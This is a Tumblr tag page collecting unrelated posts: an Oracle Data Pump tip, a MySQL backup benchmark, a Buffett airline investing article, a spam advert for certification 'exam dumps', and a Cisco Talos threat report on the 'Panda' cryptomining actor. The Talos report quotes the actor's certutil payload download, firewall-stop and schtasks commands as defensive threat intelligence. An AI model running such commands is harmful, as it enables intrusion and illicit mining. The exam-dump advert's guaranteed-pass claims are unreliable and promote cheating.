#oracle dump file estimate
Explore tagged Tumblr posts
ocptechnology · 4 years ago
Text
Estimate Required Disk Space for Export Using Estimate_only
Estimate Required Disk Space for Export Using Estimate_only
In Data Pump EXPDP command use estimate only, to check the estimate the disk space required for the export backup job without performing real export backup. Before creating the export dump it’s better to check dump size using estimate_only. For example we are going to take demo of scott user. EXPDP Estimate only Step 1. Check segment size using below command. SQL> select…
Tumblr media
View On WordPress
0 notes
globalmediacampaign · 5 years ago
Text
Performance Testing Using MySQLdump and the MySQL Shell Utility
In my previous post I explained how to take a logical backup using the mysql shell utilities. In this post, we shall compare the speed of the backup and restoration process. MySQL Shell Speed Test  We are going to do a comparison of  backup and recovery speed of mysqldump and MySQL shell utility tools. Below tools are used for speed comparison: mysqldump util.dumpInstance util.loadDump Hardware Configuration Two standalone servers with identical configurations. Server 1    * IP: 192.168.33.14    * CPU: 2 Cores    * RAM: 4 GB    * DISK: 200 GB SSD Server 2    * IP: 192.168.33.15    * CPU: 2 Cores    * RAM: 4 GB    * DISK: 200 GB SSD Workload Preparation On Server 1 (192.168.33.14), We have loaded approx 10 GB data. Now, We want to restore the data from Server 1 (192.168.33.14) to Server 2 (192.168.33.15). MySQL Setup MySQL Version: 8.0.22 InnoDB Buffer Pool Size: 1 GB InnoDB Log File Size: 16 MB Binary Logging: On We loaded 50M records using sysbench. [root@centos14 sysbench]# sysbench oltp_insert.lua --table-size=5000000 --num-threads=8 --rand-type=uniform --db-driver=mysql --mysql-db=sbtest --tables=10 --mysql-user=root --mysql-password=****** prepare WARNING: --num-threads is deprecated, use --threads instead sysbench 1.0.20 (using bundled LuaJIT 2.1.0-beta2) Initializing worker threads... ​Creating table 'sbtest3'... Creating table 'sbtest4'... Creating table 'sbtest7'... Creating table 'sbtest1'... Creating table 'sbtest2'... Creating table 'sbtest8'... Creating table 'sbtest5'... Creating table 'sbtest6'... Inserting 5000000 records into 'sbtest1' Inserting 5000000 records into 'sbtest3' Inserting 5000000 records into 'sbtest7 . . . Creating a secondary index on 'sbtest9'... Creating a secondary index on 'sbtest10'... Test Case One In this case we are going to take a logical backup using mysqldump command. Example  [root@centos14 vagrant]# time /usr/bin/mysqldump --defaults-file=/etc/my.cnf --flush-privileges --hex-blob --opt --master-data=2 --single-transaction --triggers --routines --events --set-gtid-purged=OFF --all-databases |gzip -6 -c > /home/vagrant/test/mysqldump_schemaanddata.sql.gz start_time = 2020-11-09 17:40:02 end_time   = 2020-11-09 37:19:08 It took nearly 20 minutes 19 seconds to take a dump of all databases with a total size of around 10GB. Test Case Two Now let's try with MySQL shell utility. We are going to use dumpInstance to take a full backup. Example  MySQL localhost:33060+ ssl JS > util.dumpInstance("/home/vagrant/production_backup", {threads: 2, ocimds: true,compatibility: ["strip_restricted_grants"]}) Acquiring global read lock Global read lock acquired All transactions have been started Locking instance for backup Global read lock has been released Checking for compatibility with MySQL Database Service 8.0.22 NOTE: Progress information uses estimated values and may not be accurate. Data dump for table `sbtest`.`sbtest1` will be written to 38 files Data dump for table `sbtest`.`sbtest10` will be written to 38 files Data dump for table `sbtest`.`sbtest3` will be written to 38 files Data dump for table `sbtest`.`sbtest2` will be written to 38 files Data dump for table `sbtest`.`sbtest4` will be written to 38 files Data dump for table `sbtest`.`sbtest5` will be written to 38 files Data dump for table `sbtest`.`sbtest6` will be written to 38 files Data dump for table `sbtest`.`sbtest7` will be written to 38 files Data dump for table `sbtest`.`sbtest8` will be written to 38 files Data dump for table `sbtest`.`sbtest9` will be written to 38 files 2 thds dumping - 36% (17.74M rows / ~48.14M rows), 570.93K rows/s, 111.78 MB/s uncompressed, 50.32 MB/s compressed 1 thds dumping - 100% (50.00M rows / ~48.14M rows), 587.61K rows/s, 115.04 MB/s uncompressed, 51.79 MB/s compressed Duration: 00:01:27s Schemas dumped: 3 Tables dumped: 10 Uncompressed data size: 9.78 GB Compressed data size: 4.41 GB Compression ratio: 2.2 Rows written: 50000000 Bytes written: 4.41 GB Average uncompressed throughput: 111.86 MB/s Average compressed throughput: 50.44 MB/s It took a total of 1 minute 27 seconds to take a dump of the entire database (same data as used for mysqldump) and also it shows its progress which will be really helpful to know how much of the backup has completed. It gives the time it took to perform the backup. The parallelism depends on the number of cores in the server. Roughly increasing the value won’t be helpful in my case. (My machine has 2 cores). Restoration Speed Test  In the restoration part, we are going to restore the mysqldump backup on another standalone server. The backup file was already moved to the destination server using rsync. Test Case 1  Example  [root@centos15 vagrant]#time gunzip < /mnt/mysqldump_schemaanddata.sql.gz | mysql -u root -p It took around 16 minutes 26 seconds to restore the 10GB of data. Test Case 2  In this case we are using mysql shell utility to load the backup file on another standalone host. We already moved the backup file to the destination server. Let’s start the restoration process. Example  ​ MySQL localhost:33060+ ssl JS > util.loadDump("/home/vagrant/production_backup", {progressFile :"/home/vagrant/production_backup/log.json",threads :2}) Opening dump... Target is MySQL 8.0.22. Dump was produced from MySQL 8.0.22 Checking for pre-existing objects... Executing common preamble SQL Executing DDL script for schema `cluster_control` Executing DDL script for schema `proxydemo` Executing DDL script for schema `sbtest` . . . 2 thds loading 1% (150.66 MB / 9.78 GB), 6.74 MB/s, 4 / 10 tables done 2 thds loading / 100% (9.79 GB / 9.79 GB), 1.29 MB/s, 10 / 10 tables done [Worker001] sbtest@sbtest8@@37.tsv.zst: Records: 131614 Deleted: 0 Skipped: 0 Warnings: 0 [Worker002] sbtest@sbtest10@@37.tsv.zst: Records: 131614 Deleted: 0 Skipped: 0 Warnings: 0 Executing common postamble SQL 380 chunks (50.00M rows, 9.79 GB) for 10 tables in 2 schemas were loaded in 40 min 6 sec (avg throughput 4.06 MB/s) It took around 40 minutes 6 seconds to restore the 10GB of data. Now let's try to disable the redo log and start the data importing using mysql shell utility. ​mysql> alter instance disable innodb redo_log; Query OK, 0 rows affected (0.00 sec) MySQL localhost:33060+ ssl JS >util.loadDump("/home/vagrant/production_backup", {progressFile :"/home/vagrant/production_backup/log.json",threads :2}) Opening dump... Target is MySQL 8.0.22. Dump was produced from MySQL 8.0.22 Checking for pre-existing objects... Executing common preamble SQL . . . 380 chunks (50.00M rows, 9.79 GB) for 10 tables in 3 schemas were loaded in 19 min 56 sec (avg throughput 8.19 MB/s) 0 warnings were reported during the load. After disabling the redo log, the average throughput was increased up to 2x. Note: Do not disable redo logging on a production system. It allows shutdown and restart of the server while redo logging is disabled, but an unexpected server stoppage while redo logging is disabled can cause data loss and instance corruption. Physical Backups  As you may have noticed, the logical backup methods, even if multithreaded, are quite time consuming even for a small data set that we tested them against. This is one of the reasons why ClusterControl provides physical backup method that’s based on the copying of the files - in such case we are not limited by the SQL layer that processes logical backup but rather by hardware - how fast the disk can read the files and how fast the network can transfer data between the database node and backup server. ClusterControl comes with different ways to implement physical backups, which method is available will depend on the cluster type and sometimes even the vendor. Let’s take a look at the Xtrabackup executed by ClusterControl that will create a full backup of the data on our test environment. We are going to create an ad-hoc backup this time but ClusterControl lets you create a full backup schedule as well. Here we pick the backup method (xtrabackup) as well as the host we are going to take the backup from. We can also store it locally on the node or it can be streamed to a ClusterControl instance. Additionally, you can upload the backup to the cloud (AWS, Google Cloud and Azure are supported). The backup took around 10 mins to complete. Here the logs from cmon_backup.metadata file. ​[root@centos14 BACKUP-9]# cat cmon_backup.metadata { "class_name": "CmonBackupRecord", "backup_host": "192.168.33.14", "backup_tool_version": "2.4.21", "compressed": true, "created": "2020-11-17T23:37:15.000Z", "created_by": "", "db_vendor": "oracle", "description": "", "encrypted": false, "encryption_md5": "", "finished": "2020-11-17T23:47:47.681Z" } Now let's try the same to restore using ClusterControl. ClusterControl > Backup > Restore Backup  Here we pick the restore backup option, it will support time and log based recovery too. Here we choose the backup file source path and then destination server. You also have to make sure this host can be reached from ClusterControl node using SSH. We don't want ClusterControl to set up software, so we disabled that option. After restoration it will keep the server running. It took around 4 minutes 18 seconds to restore the 10GB of data. Xtrabackup does not lock your database during the backup process. For large databases (100+ GB), it provides much better restoration time as compared to mysqldump/shell utility. Also lusterControl supports partial backup and restoration as one of my colleagues explained in his blog: Partial backup and restore. Conclusion Each method has its own pros and cons. As we have seen, there is not one method that works best for everything that you need to do. We need to choose our tool based on our production environment and target time for recovery. Tags:  MySQL database performance backup management restore https://severalnines.com/database-blog/performance-testing-using-mysqldump-and-mysql-shell-utility
0 notes
hellojessicairi-blog · 6 years ago
Text
Finalize Your Success By Preparing Your exam With 1z0-074 Exam Dumps...
Tumblr media
It is must for any IT students to take help from a result-bearing study material. With this sense, RealExamDumps has made up 1z0-074 Exam Dumps with the efforts of qualified experts. Any students who are willing to pass Oracle 1z0-074 Exam can make this attempt with guaranteed success. This compact study material contains apposite details about each exam topic. When you read throughout 1z0-074 Questions And Answers, you are supposed to have knowledge about each relevant corner of IT field. When you download this low-priced guide, you also get money back guarantee that secures your payment and brings satisfaction. A bundle of services are provided to you on this platform that can be estimated after reading the following description.
Direct Way To Success
When you will prepare from this short guide, you will never question the usefulness of  1z0-074 Study Material. You will get all the required material in well-presented manner and will be able to easily memorize syllabus. Your success is assured here under the guidance of highly qualified experts.
A Free Of Cost Trial
You don’t need to pay anything unless you are satisfied with the quality of 1z0-074 Practice Test. A free PDF file of demo questions is available for interested students that can help them make a decision. This free version will adequately tell you about how this short study guide is going to help you out.
Compact 1z0-074 Questions And Answers
You should seek help from this series of PDF questions and answers that will make you eligible to perform exceptionally in the final exam. Even you will be able to predict your success after reading from this smart study stuff. It has been tried to present all the information in the way it is to be tested in the final exam.
Apprenticeship Under Experts
What else can be wished if you get expertly guidance for you preparation from a valid and result-bearing study guide like 1z0-074 Dumps? They will give you the training according to the exam requirement so that you can produce the best possible grades. And, no doubt, for the preparation of IT exam, guidance matters a lot.
Scheduled Study Plan With Guarantee
Here you work according to a study plan that finalise your success. It shows the confidence of experts that you get money back guarantee for 1z0-074 Practice Questions. When you study according to the scheme laid down by veterans, success meets you at the end. Unless you get success, working according to the directions of experts, you are eligible to claim your money back. There is no chance of failure unless you show your negligence but our study plan will keep you active.
Revision Through Exam Simulator
Though it is enough if you go through 1z0-074 Study Guide but Online Practice Test will help you fly higher. You will definitely improve with practice test that works like exam simulator. It has been designed on the model of final exam to make you familiar to the final exam style.
Simple And Quick Download
It’s simple to buy 1z0-074 Dumps PDF from RealExamDumps. Once you get your satisfaction with free demo questions and answers, it is matter of a few clicks to download the original PDF study file. If you have any further quest about our services you can instantly contact us at [email protected] around the clock. Now your success is waiting for you at a little distance and you can touch your dreams by availing our services right now. Don’t forget to download our free demo questions.
Tumblr media
0 notes
valuentumbrian · 5 years ago
Text
Never Been More Bullish Even as Buffett Dumps Airlines
Tumblr media
Image Source: IATA. Data Source: McKinsey & Company (IATA). Airlines haven’t been able to earn their estimated cost of capital for as long as we can remember. There have been hundreds of airline bankruptcies since deregulation in 1978.
By Brian Nelson, CFA
On Saturday, May 2, Berkshire Hathaway (BRK.A, BRK.B) reported expectedly weak first-quarter results. We won’t be ditching Berkshire Hathaway’s stock in the Best Ideas Newsletter portfolio so long as Uncle Warren is at the helm, but there were a couple takeaways from the report that we want you to be aware of (we’ll have another more extensive note focusing more exclusively on Berkshire coming out soon).
The first big piece of news, something that should not be surprising to any reader of our work, is that Buffett sold his stakes in the airlines. We’ve already talked extensively about how the Oracle made a mistake in owning the airlines in the first place in Value Trap and in the following article, “Buffett Makes Another ‘Unforced Error’ in Airlines,” and we’re not reading anything at all (not on the economy, not on the equity markets) into his decision to unload shares.
Despite their oligopolistic structure, airlines do not have “moats” and arguably have decrepit economic castles. A company is generally considered a “moaty” enterprise if its ROIC, or return on invested capital, consistently exceeds its WACC (ROIC-WACC = economic profit) and is expected to continue to do so, as a result of a benign industry structure and impenetrable competitive advantages. Consistent economic profits have never happened for airlines. Airlines have always been terrible long-term investments.
According to the IATA, for example, industry-wide ROIC averaged a mere 6.7% during the 5-year period 2014-2018, well below the group’s estimated cost of capital (see image at top of this article), a period that coincides with one of the most prosperous economic environments ever witnessed across the globe. There have been hundreds of airline bankruptcies since deregulation in 1978, too, and there hasn’t been one instance where the airline industry’s ROIC has exceeded its WAAC in more than 20 years (even when oil prices collapsed in 2015/2016, ROIC still came up short).
Tumblr media
Image Source: American Airlines’ 10-K, released February 2019. A flu pandemic is a documented risk factor in airline regulatory filings.
Though COVID-19 was an unexpected catalyst, so was SARS, 9/11, oil price shocks and the Iraq war. While COVID-19 may look like it came out of left field, when it comes to the airline business, these types of shocks are part of their operations (a flu pandemic is even a documented risk factor in their regulatory filings, see image above, as illustrative), and therefore not extraordinary or even anywhere close to being considered a black swan. Massive buybacks by airlines in recent years are simply unforgiveable, as many executives even used the bankruptcy process to optimize their operations during the past few decades. They knew they were rolling the dice in a bad business.
“Let them fail,” we said more recently, and here’s what we said about what to expect from airlines in Value Trap, released December 2018:
Buffett said once that he had an 800 number that he would call anytime that he wanted to buy an airline stock again. Maybe that number has been disconnected after all these years, as Berkshire Hathaway is once again an owner of airline equities. Though the structural characteristics of an industry can and do change over time, I’m very skeptical the airline business has changed permanently for the better. Today’s airline business may be more oligopolistic in nature and much more profitable thanks to consolidation and the right-sizing of capacity, but it retains a notoriously cyclical passenger-demand profile, ties to the level and volatility of energy resource prices, considerable operating leverage, all the while barriers to entry remain low, exit barriers remain high, and fare pressure endures. The next downturn may not see as many bankruptcies as prior economic cycles due to lower unit-cost profiles, but it may turn out to only be modestly “less bad” for equity holders.
Warren Buffett ditched airlines because he knows they are terrible investments and just made a mistake, while prudently reducing exposure to the aerospace/airline industry because Berkshire also owns metal-bender Precision Castparts, one of our favorite companies that makes metal castings for jet engines. Boeing’s (BA) massive debt raise has been a material positive for the aerospace supply chain, including Precision Castparts, but the ill-health of Boeing’s airline customer base will mean commercial aerospace demand will also remain subdued for some time. We told you to stay away from Boeing a long time ago, “Boeing’s Fall from Grace.”
Tumblr media
Image (March 21, 2020): Boeing was added to the Dividend Growth Newsletter portfolio January 27, 2017, and removed March 16, 2018, prior to the unfortunate accidents that have claimed the lives of hundreds of people. We warned readers to stay far away of Boeing's stock days before its huge collapse.
Today, we remain unequivocally bullish on equities for the long run. This is somewhat of a change during the past week or so. As with Professor Siegel, we do not expect markets to come anywhere close to retest the March 23 lows. While it is now much more difficult to call near-term direction than at the top in February and in dollar-cost averaging near the bottom on March 23, we’ve never been more bullish on the long term, “Staying Focused on the Long Term,” as we fully expect moral hazard advice (indexing) to not only continue to be supported via bailouts and stimulus, but actually be rewarded, a key lesson following any financial crisis.
Tumblr media
Image Source: The final lesson to learn from financial crises. Value Trap: Theory of Universal Valuation.
The Treasury is expected to borrow ~$3 trillion during the current quarter, a tally that is nearly 6 times as much as the nearest record quarter of July-September 2008 during the depths of the Great Financial Crisis. The Fed plans to start buying ETFs this month, and Apple (AAPL) is borrowing 10-year debt at incredibly low rates of just 1.65%. Enter 1.65% as the discount rate in a DCF model. The bias is to the upside! The world also now has several ‘shots on goal’ for a new coronavirus vaccine with drug companies scaling up production even as any possible vaccine remains in early trials.
Concluding Thoughts
Warren Buffett wrote his now-famous op-ed to the New York Times on October 16, 2008, and this is what you need to know:
Over the long term, the stock market news will be good. In the 20th century, the United States endured two world wars and other traumatic and expensive military conflicts; the Depression; a dozen or so recessions and financial panics; oil shocks; a flu epidemic; and the resignation of a disgraced president. Yet the Dow rose from 66 to 11,497.
The news may be scary in coming months, and market volatility may elevate again, but we’ve never been more bullish on the longer run. The biggest advantage of an individual investor is something called time horizon arbitrage. As many professionals continue to fear a break below the March 23 lows in the near term, we’re focused on how this market absorbs the tremendous and unprecedented stimulus in the coming months and what that means for nominal equity prices in the longer run.
It may not happen this month or this year, but we expect lift off as investors race to preserve purchasing power! Our favorite ideas for a portfolio setting remain in the Best Ideas Newsletter portfolio, Dividend Growth Newsletter portfolio, and High Yield Dividend Newsletter portfolio. Our favorite brand new ideas, released each month, are included in the Exclusive publication.
Facebook (FB), PayPal (PYPL), Visa (V), and Alphabet (GOOG) remain among our favorites, in particular.
-----
Aerospace & Defense - Prime: BA, FLIR, GD, LMT, NOC, RTX
Aerospace Suppliers: ATRO, HEI, HXL, SPR, TDY, TXT
Insurance: ACE, AFL, AIG, AJG, Y, AFG, ACGL, AIZ, AXS, BRK.B, LFC, CINF, CNA, CNO, RE, ERIE, FAF, GNW, HCC, LNC, L, MFC, MBI, MCY, MET, MKL, NAVG, PRE, PRA, PL, PRU, RGA, RLI, RNR, SIGI, SFG, STFC, SLF, ALL, CB, HIG, PGR, TRV, TMK, UNM, WTM
Pharmaceuticals - Big: ABBV, ABT, AMGN, AZN, BMY, GSK, LLY, MRK, NVO, NVS, PFE, SNY
Pharmaceuticals - Biotech/Generic: ALXN, AGN, BIIB, BMRN, GILD, MYL, REGN, TEVA, VRX, VRTX, ZTS
Airline Related: AAL, ALK, DAL, HA, JBLU, LUV, SAVE, UAL
Biotech Related (vaccine/treatment): MRNA, INO, NVAX, BNTX, APDN, VXRT, TNXP, EBS, PFE, JNJ, DVAX, IMV, IBIO, REGN, SNY, GSK, ABBV, TAK, HTBX, SNGX, PDSB
Treasury Related: TLT, TBT, IEF, SHY, IEI, EDV, TMV, TMF, VGLT, SHV, BIL, VGSH
Other: XAR, IBB, JETS, SPY, DIA, QQQ
---
Valuentum members have access to our 16-page stock reports, Valuentum Buying Index ratings, Dividend Cushion ratios, fair value estimates and ranges, dividend reports and more. Not a member? Subscribe today. The first 14 days are free.
Brian Nelson owns shares in SPY and SCHG. Some of the other securities written about in this article may be included in Valuentum's simulated newsletter portfolios. Contact Valuentum for more information about its editorial policies.
0 notes
terabitweb · 6 years ago
Text
Original Post from Talos Security Author:
By Christopher Evans and David Liebenberg.
Executive summary
A new threat actor named “Panda” has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we’ve ever seen, but it still has been one of the most active attackers we’ve seen in Cisco Talos threat trap data. Panda’s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.
Panda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.
Talos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread “MassMiner” campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns.
First sightings of the not-so-elusive Panda
We first observed this actor in July of 2018 exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner that was associated with a campaign called “MassMiner” through the wallet, infrastructure, and post-exploit PowerShell commands used.
Panda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638). They used PowerShell post-exploit to download a miner payload called “downloader.exe,” saving it in the TEMP folder under a simple number filename such as “13.exe” and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000.
By October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times.
The sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block.
One of Panda’s C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name “Panda.”
Bulehero connection
Around the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called “download.exe” from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as “13.exe” and execute it. The file server turned out to be an instance of HFS hosting four malicious files.
Running the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining.
Additionally, the sample attempts to shut down the victim’s firewall with commands such as “cmd /c net stop MpsSvc”. The malware also modifies the access control list to grant full access to certain files through running cacsl.exe.
For example:
cmd /c schtasks /create /sc minute /mo 1 /tn “Netframework” /ru system /tr “cmd /c echo Y|cacls C:Windowsappveif.exe /p everyone:F
Both of these behaviors have also been observed in previous MassMiner infections.
The malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine’s IP address and location in Chinese. This behavior was also observed in the MassMiner campaign.
Additionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the “Shadow Brokers” exploits and were installed in a suspiciously named directory: “WindowsInfusedAppeEternalblue139specials”.
Evolution of Panda
In January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China.
Panda used this vulnerability to both directly download a file called “download.exe” from a46[.]bulehero[.]in and upload a simple PHP web shell to the path “/public/hydra.php”, which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to “/public/hydra.php”. Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda’s attempt to move laterally within compromised organizations.
In March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in.
At the time, the actor’s tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called “download.exe” from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. ‘C:/Windows/temp/autzipmfvidixxr7407.exe’. This file then downloads a Monero mining trojan named “wercplshost.exe” from fid[.]hognoob[.]se as well as a configuration file called “cfg.ini” from uio[.]hognoob[.]se, which provides configuration details for the miner.
“Wercplshost.exe” contains exploit modules designed for lateral movement, many of which are related to the “Shadow Brokers” exploits, and engages in SMB brute-forcing. The sample acquires the victim’s internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim’s Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords.
Soon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: “certutil.exe -urlcache -split -f http://fid%5B.%5Dhognoob%5B.%5Dse/upnpprhost.exe C:WindowsTempupnpprhost.exe”. The coinminer is also run using the command “cmd /c ping 127.0.0.1 -n 5 & Start C:Windowsugrpkute[filename].exe”.
The updated payload still includes exploit modules designed for lateral movement, many of which are related to the “Shadow Brokers” exploits. One departure, however, is previously observed samples acquire the victim’s internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim’s Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to “Scant.txt” (note the typo). The sample also writes a list of hardcoded IP ranges to “ip.txt” and passes it to Masscan to scan for port 445 and saves the results to “results.txt.” This is potentially intended to find machines vulnerable to MS17-010, given the actor’s history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords
In June, Panda began targeting a newer WebLogic vulnerability, CVE-2019-2725, but their TTPs remained the same.
Recent activity
Panda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of “a” – “z” characters and the last five consisting of digits (e.g., “xblzcdsafdmqslz19595.exe”). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se.
Besides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda’s usual lateral movement modules that include Shadow Brokers’ exploits and Mimikatz.
One difference is that several samples contained a Gh0st RAT default mutex “DOWNLOAD_SHELL_MUTEX_NAME” with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda’s earlier behavior.
On August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as “BBBBB,”, instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18.
In line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to “oo[.]mygoodluck[.]best:51888:WervPoxySvc”, and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club.
Cisco Threat Grid’s analysis also showed artifacts associated with Panda’s typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best.
Conclusion
Panda’s operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated.
However, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold.
Panda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations.
COVERAGE
For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.
Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.
Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.
AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
IOCs
Domains
a45[.]bulehero[.]in a46[.]bulehero[.]in a47[.]bulehero[.]in a48[.]bulehero[.]in a88[.]bulehero[.]in a88[.]heroherohero[.]info a[.]bulehero[.]in aic[.]fxxxxxxk[.]me axx[.]bulehero[.]in b[.]bulehero[.]in bulehero[.]in c[.]bulehero[.]in cb[.]fuckingmy[.].life cnm[.]idc3389[.]top down[.]idc3389[.]top fid[.]hognoob[.]se fxxk[.]noilwut0vv[.]club haq[.]hognoob[.]se idc3389[.]top idc3389[.]cc idc3389[.]pw li[.]bulehero2019[.]club list[.]idc3389[.]top mi[.]oops[.]best mx[.]oops[.]best nrs[.]hognoob[.]se oo[.]mygoodluck[.]best pool[.]bulehero[.]in pxi[.]hognoob[.]se pxx[.]hognoob[.]se q1a[.]hognoob[.]se qie[.]fxxxxxxk[.]me rp[.]oiwcvbnc2e[.]stream uio[.]heroherohero[.]info uio[.]hognoob[.]se upa1[.]hognoob[.]se upa2[.]hognoob[.]se wiu[.]fxxxxxxk[.]me yxw[.]hognoob[.]se zik[.]fxxxxxxk[.]me
IPs
184[.]168[.]221[.]47 172[.]104[.]87[.]6 139[.]162[.]123[.]87 139[.]162[.]110[.]201 116[.]193[.]154[.]122 95[.]128[.]126[.]241 195[.]128[.]127[.]254 195[.]128[.]126[.]120 195[.]128[.]126[.]243 195[.]128[.]124[.]140 139[.]162[.]71[.]92 3[.]123[.]17[.]223 46[.]173[.]217[.]80 5[.]56[.]133[.]246
SHA-256
